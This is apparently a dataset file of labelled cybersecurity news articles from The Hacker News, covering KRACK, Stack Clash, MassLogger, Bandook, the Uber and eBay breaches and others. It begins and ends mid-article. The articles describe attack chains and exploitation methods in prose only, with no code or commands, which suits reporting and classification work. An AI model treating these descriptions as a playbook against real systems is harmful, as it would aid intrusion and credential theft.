executed the key reinstallation attack against an Android smartphone, showing how an attacker can decrypt all data that the victim transmits over a protected WiFi. You can watch the video demonstration above and download proof-of-concept (PoC) code from Github. ""Decryption of packets is possible because a key reinstallation attack causes the transmit nonces (sometimes also called packet numbers or initialization vectors) to be reset to zero. As a result, the same encryption key is used with nonce values that have already been used in the past,"" the researcher say. The researchers say their key reinstallation attack could be exceptionally devastating against Linux and Android 6.0 or higher, because ""Android and Linux can be tricked into (re)installing an all-zero encryption key (see below for more info)."" However, there's no need to panic, as you aren't vulnerable to just anyone on the internet because a successful exploitation of KRACK attack requires an attacker to be within physical proximity to the intended WiFi network. WPA2 Vulnerabilities and their Brief Details The key management vulnerabilities in the WPA2 protocol discovered by the researchers has been tracked as: CVE-2017-13077: Reinstallation of the pairwise encryption key (PTK-TK) in the four-way handshake. CVE-2017-13078: Reinstallation of the group key (GTK) in the four-way handshake. CVE-2017-13079: Reinstallation of the integrity group key (IGTK) in the four-way handshake. CVE-2017-13080: Reinstallation of the group key (GTK) in the group key handshake. CVE-2017-13081: Reinstallation of the integrity group key (IGTK) in the group key handshake. CVE-2017-13082: Accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it. CVE-2017-13084: Reinstallation of the STK key in the PeerKey handshake. CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake. CVE-2017-13087: reinstallation of the group key (GTK) while processing a Wireless Network Management (WNM) Sleep Mode Response frame. CVE-2017-13088: reinstallation of the integrity group key (IGTK) while processing a Wireless Network Management (WNM) Sleep Mode Response frame. The researchers discovered the vulnerabilities last year, but sent out notifications to several vendors on July 14, along with the United States Computer Emergency Readiness Team (US-CERT), who sent out a broad warning to hundreds of vendors on 28 August 2017. ""The impact of exploiting these vulnerabilities includes decryption, packet replay, TCP connection hijacking, HTTP content injection, and others,"" the US-CERT warned. ""Note that as protocol-level issues, most or all correct implementations of the standard will be affected."" In order to patch these vulnerabilities, you need to wait for the firmware updates from your device vendors. According to researchers, the communication over HTTPS is secure (but may not be 100 percent secure) and cannot be decrypted using the KRACK attack. So, you are advised to use a secure VPN service—which encrypts all your Internet traffic whether it's HTTPS or HTTP. You can read more information about these vulnerabilities on the KRACK attack's dedicated website, and the research paper. The team has also released a script using which you can check whether if your WiFi network is vulnerable to the KRACK attack or not. We will keep updating the story. Stay Tuned! ",Vulnerability "$60000 for Exploiting Google Chrome, Hackers at Pwnium work...",https://thehackernews.com/2012/02/60000-for-exploiting-google-chrome.html,"$60000 for Exploiting Google Chrome, Hackers at Pwnium work... Google has offered prizes, totalling $1 million, to those who successfully hack the Google Chrome browser at the Pwn2Own hacker contest taking place next week i.e 7 March 2012. Chrome is the only browser in the contest's six year history to not be exploited like at all. Therefore Google will hand out prizes of $60,000, $40,000, and $20,000 for contestants able to remotely commandeer a fully-patched browser running on Windows 7. Finding a ""Full Chrome Exploit,"" obtaining user account persistence using only bugs in the browser itself will net the $60k prize. Using webkits, flash, or a driver-based exploit can only earn the lesser amounts. Prizes will be awarded on a first-come-first-serve basis, until the entire $1 million has been claimed. ""While we're proud of Chrome's leading track record in past competitions, the fact is that not receiving exploits means that it's harder to learn and improve,"" said Chris Evans and Justin Schuh, members of the Google Chrome security team. ""To maximize our chances of receiving exploits this year, we've upped the ante. We will directly sponsor up to $1 million worth of rewards."" Pwn2Own isn't the only time researchers can be paid for digging up security flaws in Chrome. Like other companies including Mozilla and Facebook, Google offers ""bug bounties"" to researchers, and its flaw-buying program has given out more than $300,000 in payments over the last two years. [Source] ",Vulnerability New Group of Hackers Targeting Businesses with Financially Motivated Cyber Attacks,https://thehackernews.com/2019/11/financial-cyberattacks.html,"Security researchers have tracked down activities of a new group of financially-motivated hackers that are targeting several businesses and organizations in Germany, Italy, and the United States in an attempt to infect them with backdoor, banking Trojan, or ransomware malware. Though the new malware campaigns are not customized for each organization, the threat actors appear to be more interested in businesses, IT services, manufacturing, and healthcare industries who possess critical data and can likely afford high ransom payouts. According to a report ProofPoint shared with The Hacker News, the newly discovered threat actors are sending out low-volume emails impersonating finance-related government entities with tax assessment and refund lured emails to targeted organizations. ""Tax-themed Email Campaigns Target 2019 Filers, finance-related lures have been used seasonally with upticks in tax-related malware and phishing campaigns leading up to the annual tax filing deadlines in different geographies,"" the researchers said. New Malware Campaigns Spotted in the Wild In almost all spear-phishing email campaigns researchers observed between October 16 and November 12 this year, the attackers used malicious Word document attachments as an initial vector to compromise the device. Once opened, the malicious document executes a macro script to run malicious PowerShell commands, which then eventually downloads and installs one of the following payloads onto the victim's system: Maze Ransomware, IcedID Banking Trojan, Cobalt Strike backdoor. 'Opening the Microsoft Word Document and enabling macros installs Maze ransomware on the user's system, encrypting all of their files, and saves a ransom note resembling the following in TXT format in every directory.' Besides using social engineering, to make their spear-phishing emails more convincing, attackers are also using lookalike domains, verbiage, and stolen branding to impersonate: Bundeszentralamt fur Steuern, the German Federal Ministry of Finance, Agenzia Delle Entrate, the Italian Revenue Agency, 1&1 Internet AG, a German internet service provider, USPS, the United States Postal Service. ""Similar campaigns leveraging local gov. agencies were also observed in Germany and Italy. These social-engineered lures indicate that cybercriminals overall are becoming more convincing and sophisticated in their attacks."" ""Although these campaigns are small in volume, currently, they are significant for their abuse of trusted brands, including government agencies, and for their relatively rapid expansion across multiple geographies. To date, the group appears to have targeted organizations in Germany, Italy, and, most recently, the United States, delivering geo-targeted payloads with lures in local languages,"" Christopher Dawson, Threat Intelligence Lead at Proofpoint, told The Hacker News. ""We will be watching this new actor closely, given their apparent global aspirations, well-crafted social engineering, and steadily increasing scale."" How to Protect Email-Based Cyber Attacks? Thought most of the tools and techniques used by this new group are neither new nor sophisticated; unfortunately, it's still one of the most successful ways criminals penetrate an organization. The best ways to protect your computer against such attacks are as simple as following basic online cybersecurity practices, such as: Disable macros from running in office files, Always keep a regular backup of your important data, Make sure you run one of the best antivirus software on your system, Don't open email attachments from unknown or untrusted sources, Don't click on the links from unknown sources. ",Malware Experts Uncover Malware Attacks Targeting Corporate Networks in Latin America,https://thehackernews.com/2021/07/experts-uncover-malware-attacks.html,"Cybersecurity researchers on Thursday took the wraps off a new, ongoing espionage campaign targeting corporate networks in Spanish-speaking countries, specifically Venezuela, to spy on its victims. Dubbed ""Bandidos"" by ESET owing to the use of an upgraded variant of Bandook malware, the primary targets of the threat actor are corporate networks in the South American country spanning across manufacturing, construction, healthcare, software services, and retail sectors. Written in both Delphi and C++, Bandook has a history of being sold as a commercial remote access trojan (RAT) dating all the way back to 2005. Since then, numerous variants have emerged on the threat landscape and put to use in different surveillance campaigns in 2015 and 2017, allegedly by a cyber-mercenary group known as Dark Caracal on behalf of government interests in Kazakhstan and Lebanon. In a continuing resurgence of the Bandook Trojan, Check Point last year disclosed three new samples — one of which supported 120 commands — that were utilized by the same adversary to hit government, financial, energy, food industry, healthcare, education, IT, and legal institutions located in Chile, Cyprus, Germany, Indonesia, Italy, Singapore, Switzerland, Turkey, and the U.S. The latest attack chain commences with prospective victims receiving malicious emails with a PDF attachment, which contains a shortened URL to download a compressed archive hosted on Google Cloud, SpiderOak, or pCloud and the password to extract it. Extracting the archive reveals a malware dropper that decodes and injects Bandook into an Internet Explorer process. Interestingly, the latest variant of Bandook analyzed by ESET contains 132 commands, up from the 120 commands reported by Check Point, implying that the criminal group behind the malware are advancing their malicious tools with improved capabilities and striking power. ""Especially interesting is the ChromeInject functionality,"" said ESET researcher Fernando Tavella. ""When the communication with the attacker's command and control server is established, the payload downloads a DLL file, which has an exported method that creates a malicious Chrome extension. The malicious extension tries to retrieve any credentials that the victim submits to a URL. These credentials are stored in Chrome's local storage."" Some of the main commands that the payload is capable of processing include listing directory contents, manipulating files, taking screenshots, controlling the cursor on the victim's machine, installing malicious DLLs, terminating running processes, downloading files from a specific URL, exfiltrating the results of the operations to a remote server, and even uninstalling itself from the infected machines. If anything, the development is yet another sign that adversaries can still leverage old crimeware solutions to facilitate attacks. ""[Bandook's] involvement in different espionage campaigns [...] shows us that it is still a relevant tool for cybercriminals,"" the researchers opined. ""Also, if we consider the modifications made to the malware over the years, it shows us the interest of cybercriminals to keep using this piece of malware in malicious campaigns, making it more sophisticated and more difficult to detect."" ",Cyber_Attack "After Getting Hacked, Uber Paid Hackers $100,000 to Keep Data Breach Secret",https://thehackernews.com/2017/11/uber-hack-data-breach.html,"Uber is in headlines once again—this time for concealing last year's data breach that exposed personal data of 57 million customers and drivers. On Tuesday, Uber announced that the company suffered a massive data breach in October 2016 that exposed names, e-mail addresses and phone numbers of 57 million Uber riders and drivers along with driver license numbers of around 600,000 drivers. However, instead of disclosing the breach, the company paid $100,000 in ransom to the two hackers who had access to the data in exchange for keeping the incident secret and deleting the information, according to a report published by Bloomberg. Uber said none of its own systems were breached, rather two individuals outside the company inappropriately accessed and downloaded 57 million Uber riders' and drivers' data that was stored on a third-party cloud-based service. The cyberattack exposed the names and driver license numbers of some 600,000 drivers in the United States, and the names, emails, and mobile phone numbers of around 57 million Uber users worldwide, which included drivers as well. However, the company said other personal details, such as trip location history, credit card numbers, bank account numbers, Social Security numbers or dates of birth, were not accessed in the attack. Uber Hid 57 Million User Data Breach For Over a Year According to Bloomberg report, former Uber CEO Travis Kalanick learned of the cyber attack in November 2016, when the company was negotiating with the Federal Trade Commission (FTC) on a privacy settlement. So, the company chose to pay the two hackers $100,000 to delete the stolen information and keep quiet about the incident and finally agreed to the FTC settlement three months ago, without admitting any wrongdoing. Uber Technologies Inc. only told the FTC about the October 2016 data incident on Tuesday, when the breach was made public by Bloomberg. However, this secret payment eventually cost Uber security executives their jobs for handling the incident. Now Uber CEO Dara Khosrowshahi has reportedly asked for the resignation of Uber Chief Security Officer Joe Sullivan, and one of his deputies, Craig Clark, who worked to keep the attack quiet. ""None of this should have happened, and I will not make excuses for it. While I cannot erase the past, I can commit on behalf of every Uber employee that we will learn from our mistakes,"" Khosrowshahi said. ""We are changing the way we do business, putting integrity at the core of every decision we make and working hard to earn the trust of our customers."" Uber is notifying regulatory authorities and offering affected drivers free credit monitoring and identity theft protection. The company also says that it is monitoring the affected accounts for fraudulent activity and that riders do not need to take any action against this incident. It's likely that Uber will be forcing its customers to reset their passwords for its app. ",Data_Breaches "eBay Hacked, Change your Account Password Now",https://thehackernews.com/2014/05/ebay-hacked-change-your-account.html,"If you have an eBay Account then you should change your password immediately, because the World's biggest E-commerce company with 128 million active users announced today in a press release that it had been Hacked. eBay revealed that attackers compromised customers' database including emails, physical addresses, encrypted passwords and dates of birth, in a hacking attack between late February and early March, but financial information like credit card numbers, as well as PayPal information were stored separately and were not compromised. 'After conducting extensive tests on its networks,' They also said they've found no evidence of unauthorized access or activity by registered eBay users, but as precaution, eBay is resetting everyone's passwords that 'will help enhance security for eBay users.' Why did eBay wait so long to tell everyone? because just two weeks ago they discovered data breach. They conducted a forensic investigation of its computers to find the extent of the theft and found that intruders compromised some employees accounts and then used their access to get the data from servers. ""Cyber attackers compromised a small number of employee login credentials, allowing unauthorized access to eBay's corporate network,"" the company said in a statement. They detected the unauthorized employee logins two weeks ago and ""Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers."" company said. eBay customers are now potentially vulnerable to phishing attacks i.e. spoofed e-mails. Hackers or spammers could craft very convincing phishing emails which may appear legitimate at first glance, but could trick you into revealing further personal information. To change your eBay password, log into your account, select Account Settings, then click ""Personal Information"", then ""edit"" next to your password. If you are using same login details for other websites, you should also update them as soon as possible. ",Cyber_Attack U.S. federal lab linked to Stuxnet breached !,https://thehackernews.com/2011/04/us-federal-lab-linked-to-stuxnet.html,"A federally funded U.S. lab that is suspected to have been involved in finding the vulnerabilities in Siemens SCADA systems used by the Stuxnet worm has shut down the Internet connection for its employees following the discovery of a breach into the facility's systems. The Oak Ridge National Laboratory - located in Tennessee and funded by the U.S. Department of Energy - is known for performing classified and unclassified research for federal agencies and departments on issues crucial for national security. Among other things, the lab also does cybersecurity research on malware, vulnerabilities and phishing. It is somewhat ironic, then, that the breach was the result of two employees falling for a malicious email containing a link to a page that exploited a remote-code execution vulnerability in the Internet Explorer browser. According to Wired, the email was sent to about 530 lab employees, of which 57 believed that the email was coming from the institution's human resources department and clicked on the link. Of those 57 machines, only two got infected. It seems that the malware inserted in those two computers lay dormant for a week, and then started to send out stolen data from one of them to a remote server. This was discovered by the administrators who immediately shut down and cleaned up the machine, but a week later, they discovered that other servers were also infected - hence, the total shutdown of Internet access. Thomas Zacharia, the deputy director of the lab, didn't say what data had been stolen, but he confirmed it was encrypted. He hopes that the investigation will reveal the nature of the data and the destination of the stolen batch. He also commented that the malware used in the attack was designed to hide on the system and to delete itself if it was unsuccessful on a particular system. According to a New York Times article, the Oak Ridge National Laboratory was used to test and reveal the vulnerabilities that allowed the Stuxnet worm to target the Natanz nuclear plant. This claim being now in the open, it is easy to see how speculations about the origin of the attack that hit the lab's network are inevitably going to lean towards Iran. ",Malware Avira Vulnerability Puts Users' Online Backup Data At Risk,https://thehackernews.com/2014/09/avira-vulnerability-puts-users-online.html,"A popular Anti-virus software Avira that provides free security software to its customers with Secure Backup service is vulnerable to a critical web application vulnerability that could allow an attacker to take over users' account, putting millions of its users' account at risk. Avira is very popular for their free security software that comes with its own real-time protection module against malware and a secure backup service. Avira was considered to be the sixth largest antivirus vendor in 2012 with over 100 million customers worldwide. A 16 year-old security researcher 'Mazen Gamal' from Egypt told The Hacker News that Avira Website is vulnerable to CSRF (Cross-site request forgery) vulnerability that allows him to hijack users' accounts and access to their online secure cloud backup files. CSRF VULNERABILITY TO ACCOUNT TAKEOVER Cross-Site Request Forgery (CSRF or XSRF) is a method of attacking a Web site in which an intruder masquerades as a legitimate and trusted user. All the attacker need to do is get the target browser to make a request to your website on their behalf by convincing the victim to click on a specially crafted HTML exploit page. Basically, an attacker will use CSRF exploit to trick a victim into accessing a URL link that contains malicious requests which will replace victim's email ID on Avira account with attacker's email ID, compromising victim's account in just one click, explained Gamal. VICTIM BACKUP FILES After replacing the email address, an attacker can easily reset the password of victim's account through forget password option, as it will send the password reset link to attacker's email ID only. Once hijacked, the attacker would be able to retrieve all the online backup files the victim have on his/her AVIRA account by simply using the same credentials to login into the user's Online backup Software or at https://dav.backup.avira.com/. ""I found a CSRF vulnerability in Avira can lead me to full account takeover of any Avira user account,"" Gamal said via an email to The Hacker News. ""The impact of the account takeover allowed me to Open the Backup files of the victim and also view the license codes for the affected user."" Gamal also provided Proof-of-Concept video that explains the full story Gamal reported the flaw to the Avira Security Team on 21st August. The team responded positively and patched the CSRF bug on their website, but the Secure online backup service is still vulnerable to hackers until Avira will not offer a offline password layer for decrypting files locally. Mazen Gamal has been listed in a number of tech firms including Google, Facebook and Twitter for reporting several vulnerabilities in past. ",Vulnerability TripAdvisor's Viator Hit by Massive Data Breach Affecting 1.4 Customers,https://thehackernews.com/2014/09/tripadvisors-viator-hit-by-massive-14_24.html,"TripAdvisor's Online travel booking and review website Viator has reportedly been hit by a massive data breach at its that may have exposed payment card details and account credentials of its customers, affecting an estimated 1.4 million of its customers. The San Francisco-based Viator, acquired by TripAdvisor – the world's largest travel site – for £122 million (US$ 200 million) back in July, admitted late on Friday that the intruders have hacked into some of its customers' payment card accounts and made unauthorized charges. The data breach was discovered in the bookings made through Viator's websites and mobile offerings that could potentially affect payment card data. Viator said that the company has hired forensic experts to figure out the extent of the breach. Meanwhile, the company has begun notifying its affected customers about the security breach as said by the travel outfit in a press release. ""On September 2, we were informed by our payment card service provider that unauthorized charges occurred on a number of our customers' credit cards,"" Viator wrote. ""We have hired forensic experts, notified law enforcement and we have been working diligently and comprehensively to investigate the incident, identify how our systems may have been impacted, and secure our systems."" ""While our investigation is ongoing, we are in the process of notifying approximately 1.4 million Viator customers, who had some form of information potentially affected by the compromise."" During investigation it found that the cyber criminals have broken into its internal databases and accessed the payment card data – including encrypted credit or debit card number, card expiration date, name, billing address and email address – of approximately 880,000 customers, and possibly their Viator account information that includes email address, encrypted password and Viator 'nickname.' Additionally, the intruders may have also accessed the Viator account information, including email addresses and encrypted passwords, of over 560,000 Viator customers. According to the company, Debit-card PIN numbers were not included in the breach because Viator does not store them. The travel advisor said that they believe that the CVV number, the security numbers printed on the back of the customer's credit card, were also not stolen in the breach. For those who are affected by the breach in United States, Viator is offering them identity protection and credit card monitoring services for free and and the company is also investigating the possibility of offering similar services to customers outside the country. Meanwhile, the company has warned its affected customers to regularly monitor their card activity and report any fraudulent charges to their card company. ""Customers will not be responsible for fraudulent charges to their accounts if they are reported in a timely manner,"" Viator said. Viator also recommends its users to change their password for the site, as well as all other websites that uses the same credentials. ",Data_Breaches "Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials",https://thehackernews.com/2021/02/masslogger-trojan-upgraded-to-steal-all.html,"A credential stealer infamous for targeting Windows systems has resurfaced in a new phishing campaign that aims to steal credentials from Microsoft Outlook, Google Chrome, and instant messenger apps. Primarily directed against users in Turkey, Latvia, and Italy starting mid-January, the attacks involve the use of MassLogger — a .NET-based malware with capabilities to hinder static analysis — building on similar campaigns undertaken by the same actor against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020. MassLogger was first spotted in the wild last April, but the presence of a new variant implies malware authors are constantly retooling their arsenal to evade detection and monetize them. ""Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain,"" researchers with Cisco Talos said on Wednesday. Compiled HTML (or .CHM) is a proprietary online help format developed by Microsoft that's used to provide topic-based reference information. The new wave of attacks commences with phishing messages containing ""legitimate-looking"" subject lines that appear to relate to a business. One of the emails targeted at Turkish users had the subject ""Domestic customer inquiry,"" with the body of the message referencing an attached quote. In September, October and November, the emails took the form of a ""memorandum of understanding,"" urging the recipient to sign the document. Regardless of the message theme, the attachments adhere to the same format: a RAR multi-volume filename extension (e.g., ""70727_YK90054_Teknik_Cizimler.R09"") in a bid to bypass attempts to block RAR attachments using its default filename extension "".RAR."" These attachments contain a single compiled HTML file that, when opened, displays the message ""Customer service,"" but in fact comes embedded with obfuscated JavaScript code to create an HTML page, which in turn contains a PowerShell downloader to connect to a legitimate server and fetch the loader ultimately responsible for launching the MassLogger payload. Aside from exfiltrating the amassed data via SMTP, FTP or HTTP, the latest version of MassLogger (version 3.0.7563.31381) features functionality to pilfer credentials from Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave. ""Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality,"" the researchers noted, adding the threat actor installed a version of Masslogger control panel on the exfiltration server. With the campaign almost entirely executed and present only in memory with the sole exception of the compiled HTML help file, the significance of conducting regular memory scans cannot be overstated enough. ""Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format,"" the researchers concluded. ",Cyber_Attack Al-Qaida sites knocked offline before release of 'Salil al-Sawarim 3' movie,https://thehackernews.com/2012/12/al-qaida-sites-knocked-offline-before.html,"U.S. intelligence sources confirmed that, Official websites of Al-Qaida were knocked offline two weeks back and still down due to DDoS attack. According to source, ""This is one of the longest disruptions the organization has experienced since it set up its online distribution system in 2006. Al-Qaida also was hit by a massive cyber attack in late 2008, from which the online network never recovered."" The websites are forced to offline, just before the release of a film titled as ""Salil al-Sawarim 3"", which is actually the propaganda video of Iraqi soldiers with dead insurgents by Al-Qaida. From last few months, online jihadists are discussing the release and had been sharing images and footage from the production. The cyber attack comes as the U.S. State Department, according to a senior official. The cyber attack on Al-Qaida network delayed the release of movie. According to another source, the last version ""Salil As-Sawarim 2"" movie was downloaded by more than half million people around the world, Last release of video covered the operations of the Mujahideen special forces of the Daulah Islam of Iraq against the high-ranking officers of the Anti Terror special forces (SWAT) of the Shi'ah regime of Iraq. ""Al-Qaida has been using the websites to post propaganda that experts say is successfully radicalizing youth all over the world, including in Syria where the organization is believed to be active."" ",Cyber_Attack A Decade Old Unix/Linux/BSD Root Privilege-Escalation Bug Discovered,https://thehackernews.com/2017/06/linux-root-privilege-escalation.html,"Update: Find working Exploits and Proof-of-Concepts at the bottom of this article. Security researchers have discovered more than a decade-old vulnerability in several Unix-based operating systems — including Linux, OpenBSD, NetBSD, FreeBSD and Solaris — which can be exploited by attackers to escalate their privileges to root, potentially leading to a full system takeover. Dubbed Stack Clash, the vulnerability (CVE-2017-1000364) has been discovered in the way memory was being allocated on the stack for user space binaries. Exploiting Stack Clash Bug to Gain Root Access The explanation is simple: Each program uses a special memory region called the stack, which is used to store short-term data. It expands and contracts automatically during the execution of any program, depending upon the needs of that program. According to researchers at Qualys, who discovered and reported this bug, a malicious program can attempt to use more memory space than available on the stack, which could overflow the memory, causing it to collide or clash with nearby memory regions and overwrite their content. Moreover, the Stack Clash exploit can also bypass the stack guard-page, a memory management protection introduced in 2010, after this issue was exploited in 2005 and 2010. ""Unfortunately, a stack guard-page of a few kilobytes is insufficient: if the stack-pointer 'jumps' over the guard-page—if it moves from the stack into another memory region without accessing the guard-page—then no page-fault exception is raised and the stack extends into the other memory region,"" an advisory published by Qualys read. The Stack Clash vulnerability requires local access to the vulnerable system for exploitation, but researchers said it could be exploited remotely depending upon the applications. For example, a malicious customer with low privilege account with a web hosting company, running vulnerable system, could exploit this vulnerability to gain control over other websites running on the same server, as well as remotely gain root access and execute malicious code directly. Just yesterday, we reported that how a web hosting company fell victim to a similar attack used to infect Linux servers with a ransomware malware, causing the company to pay more than $1 Million in ransom to get back their files. Attackers can also combine the Stack Clash bug with other critical vulnerabilities, like the Sudo vulnerability recently patched, and then run arbitrary code with the highest privileges, said Qualys researchers. 7 Proof-of-Concept Exploits The researchers said they were able to develop seven exploits and seven proofs of concept (PoCs) for the Stack Clash vulnerability, which works on Linux, OpenBSD, NetBSD, FreeBSD and Solaris on 32-bit and 64-bit x86 processors. However, the researchers have not yet published the exploits and proofs of concept, giving users and admins enough time to patch their systems before they go into the Stack Clash exploits public. The PoCs follow four steps, which include 'Clashing' the stack with another memory region, running the stack pointer to the stack's start, 'Jumping' over the stack guard-page and 'Smashing' the stack or the other memory regions. Among distros and systems affected by Stack Clash include: Sudo on Debian, Ubuntu, and CentOS ld.so and most SUID-root binaries on Debian, Ubuntu, Fedora, and CentOS Exim on Debian rsh on Solaris 11 and so on Red Hat Enterprise The company also believes that other operating systems, including Microsoft's Windows, Apple's OS X/macOS and Google's Linux-based Android OS could also be vulnerable to Stack Clash, though it is yet to be confirmed. Patch Available; Update Now Many affected vendors have already issued security patches for the bug, so users and administrators are advised to install patches a soon as possible. If security patches from your vendor are yet to be released, you can reboot your systems or can manually apply stack limits to local users' applications. Simply, set the hard RLIMIT STACK and RLIMIT_AS of local users and remote services to a low value. It is also recommended to recompile all userland code (ld.so, libraries, binaries) with the –fstack-check feature. This would prevent the stack pointer from moving into another memory region without accessing the stack guard-page and would kill Stack Clash dead. Exploits and Proof-of-Concepts Released! Since Fedora and Slackware have published updates, and FreeBSD and NetBSD have issued patches, Qualys researchers have finally released exploits and POCs for the Stack Clash vulnerability. You can find all exploits and PoCs here and here. ",Vulnerability Chinese hackers attack on White House computers,https://thehackernews.com/2012/10/chinese-hackers-attack-on-white-house.html,"The White House acknowledged Monday that one of its computer networks was hit by a cyber attack, but said there was no breach of any classified systems and no indication any data was lost. Including systems used by the military for nuclear commands were breached by Chinese hackers. A conservative newspaper that has been regularly critical of the Obama administration, called The Washington Free Beacon, first published the report on Sunday and said that the attackers were linked to the Chinese government. One official said the cyber breach was one of Beijing's most brazen cyber attacks against the United States and highlights a failure of the Obama administration to press China on its persistent cyber attacks. Disclosure of the cyber attack also comes amid heightened tensions in Asia, as the Pentagon moved two U.S. aircraft carrier strike groups and Marine amphibious units near waters by Japan's Senkaku islands. The official called the incident a ""spear-phishing"" attack, which implies that it was aimed specifically at the White House. Spear-phishing entails using somethings such as a personalized e-mail to trick someone into clicking on a malicious link or downloading a file. The attempted hacking of U.S. military networks used by the White House is a common occurrence, but success is rare. Things get a bit more terrifying when you learn what exactly China was after. The Free Beacon's report says that the hackers were trying to get into the White House Military Office system. This is the system the contains the codes for the football the collection of nuclear launch codes that the president has on him at all times. ",Cyber_Attack FireEye spotted Critical 0-day vulnerability in Java Runtime Environment,https://thehackernews.com/2012/08/fireeye-spotted-critical-0-day.html,"FireEye's Malware Intelligence Lab is making the claim that there is a new zero day vulnerability in the wild that affects the latest version of Java.Researcher. Atif Mushtaq wrote on the company's blog that he spotted the initial exploit on a domain that pointed to an IP address in China. The vulnerability allows computers to be infected by simply visiting a specially crafted web page, and the malware served in the current attacks contacts a C&C server in Singapore. Researchers from heise Security have also created a PoC page using information that is publicly available. A separate post published on Monday by researchers Andre M. DiMino and Mila Parkour said the number of attacks, which appear to install the Poison Ivy Remote Access Trojan, were low. But they went on to note that the typical delay in issuing Java patches, combined with the circulation of exploit code, meant it was only a matter of time until the vulnerability is exploited more widely by other attackers. Developers at vulnerability management company Rapid7, which owns the Metasploit Project, on Sunday added the exploit to their penetration testing framework. And the exploit is expected to show up if it hasn't already in the widely used BlackHole exploit toolkit, one of the most popular threats on the web. ""This vulnerability is not a 'memory corruption' type vulnerability, but instead seems to be a security bypass issue that allows running untrusted code outside the sandbox without user interaction,"" Eiram said. ""In this specific case a file is downloaded and executed on the user's system when just visiting a web page hosting a malicious applet."" It's not clear when Oracle will release a patch for this vulnerability. The company did not immediately respond to a request for comment. Some security experts are prepping an unofficial patch for the program that should blunt this vulnerability. However, uninstalling or disabling Java is probably not an acceptable solution for a large number of companies and users that rely on Java-based Web applications to conduct their daily business. ",Vulnerability Bitcoin mining malware found in E-Sports Entertainment (ESEA) software,https://thehackernews.com/2013/05/bitcoin-mining-malware-found-in-e.html,"The Bitcoin mining rig is becoming a popular alternative to people who want an easy way to earn the digital currency. All you have to do is plug the hardware that specializes in Bitcoin mining and run its customized software. After that, you can sit back and relax as it mines the digital currency for you. A popular eSports league has admitted that one of its employees harnessed the power of member's computers without their knowledge in order to mine Bitcoins. For a period of 2 weeks, gamers noticed that their computers were generating unusually high GPU loads and frequent BSOD errors. Some gamers stated that their GPUs were damaged due to them reaching temperatures above 90 degrees Celsius. The mining began on April 13th and affected thousands of gamers, who unwittingly mined over $3,700 worth of the currency. Eric Thunberg, co-owner of ESEA, stated that the Bitcoin miner was meant to be part of an April Fools joke, however, they weren't able to finish it in time. They then decided to put some of the test code into the clients belonging to a few ESEA administrators. They wanted to see if the bitcoin miner would offer any benefits to the ESEA community. After 2 days of testing, they decided to cancel the project altogether. Unfortunately, according to an official statement released by Craig Levine, the other co-owner of ESEA, an employee involved in the test decided to use the test codes for his own personal gain ESEA distributes anti-cheat software that allows subscribers to play the Counter-Strike first-person shooter game on their network. The software gives players better data on their game play and cuts down on the use of known game cheats, which can give opponents an unfair advantage. The network has close to 14,000 paying customers. ESEA co-founder Craig Torbull Levine said ""The owners and management at ESEA all apologize to each of you that were impacted by the recent events and intend to make things right,"" Torbull continues ""ESEA has issued a free month of ESEA Premium to all of our community members who were enrolled in Premium for the month of April. We also ask anyone who has experienced any physical damage to their computers to open an ESEA support ticket."" As of this morning, ESEA has made sure that all Bitcoin mining has stopped. ESEA is also in the process of taking all necessary steps internally to ensure that nothing like this ever happens again. The news is quite disturbing considering that many people have been using their services in order to play games online fairly or without worrying about other players cheating their way out of the game. ",Malware First Large Cyber Espionage Activity against Pakistan Emanating From India,https://thehackernews.com/2013/05/first-large-cyber-espionage-activity.html,"Cyber Security researchers have discovered a family of information stealing malware targeting Pakistan that originates out of India. Norman Shark, the global security leader in malware analysis solutions for enterprises, service providers and government, today released a report detailing a large and sophisticated cyber-attack infrastructure that appears to have originated from India. The attacks, conducted by private threat actors over a period of three years and still ongoing, showed no evidence of state sponsorship but the primary purpose of the global command-and-control network appears to be intelligence gathering from a combination of national security targets and private sector companies. Attackers used known vulnerabilities in Microsoft software, chucking malware dubbed HangOver onto target machines, most of which were based in Pakistan, where 511 infections associated with the campaign were detected. HangOver installs keyloggers, takes screenshots and records victims' browser usage, before sending the pilfered data off to remote servers by FTP or HTTP. The malware installed on the infected computers is primarily designed to steal information, but its functionality can be enhanced with additional modules. There's also evidence that the attackers are signing their code with an old certificate that was issued in 2011 to Technical and Commercial Consulting Pvt. Ltd., a firm based in New Delhi, India. The certificate had been revoked in late March 2012, but was still in use. Eset contacted VeriSign, which revoked the certificate. Eset found more than 70 binary files signed with the malicious certificate. The payloads dropped by the malware offer a range from access. ESET discovered downloaders, document uploaders, keyloggers, reverse shells, and payloads with the ability to self-replicate within a network. There was another association with India in the repeated appearance of the word ""Appin"". ""There seems to be some connection with the Indian security company called Appin Security Group,"" Norman wrote. Domains used by the attack infrastructure were shown to have been registered by Appin Security Solutions too. Another firm, Mantra Tech Ventures, was also hosting a number of malicious sites run by the attackers, Norman said. The report said that the attackers used NirSoft's WebPassView and Mail PassView tools for recovering passwords in email clients and browser stores; the tools were signed by the malicious certificate. Update: Spokesperson from Appin responded about the Norman's Findings via email ""Appin The Appin Security Group is no manner connected or involved with the activities as sought to be implied in the alleged report. As is apparent from the alleged report itself, the same is only a marketing gimmick on the part of Norman AS. The Appin Security Group has already initiated legal proceedings against Norman AS."" Abhishek, Corporate Communications Team, Appin Security Group said. ",Cyber_Attack "Watch Out! Adrozek Malware Hijacking Chrome, Firefox, Edge, Yandex Browsers",https://thehackernews.com/2020/12/watch-out-adrozek-malware-hijacking.html,"Microsoft on Thursday took the wraps off an ongoing campaign impacting popular web browsers that stealthily injects malware-infested ads into search results to earn money via affiliate advertising. ""Adrozek,"" as it's called by the Microsoft 365 Defender Research Team, employs an ""expansive, dynamic attacker infrastructure"" consisting of 159 unique domains, each of which hosts an average of 17,300 unique URLs, which in 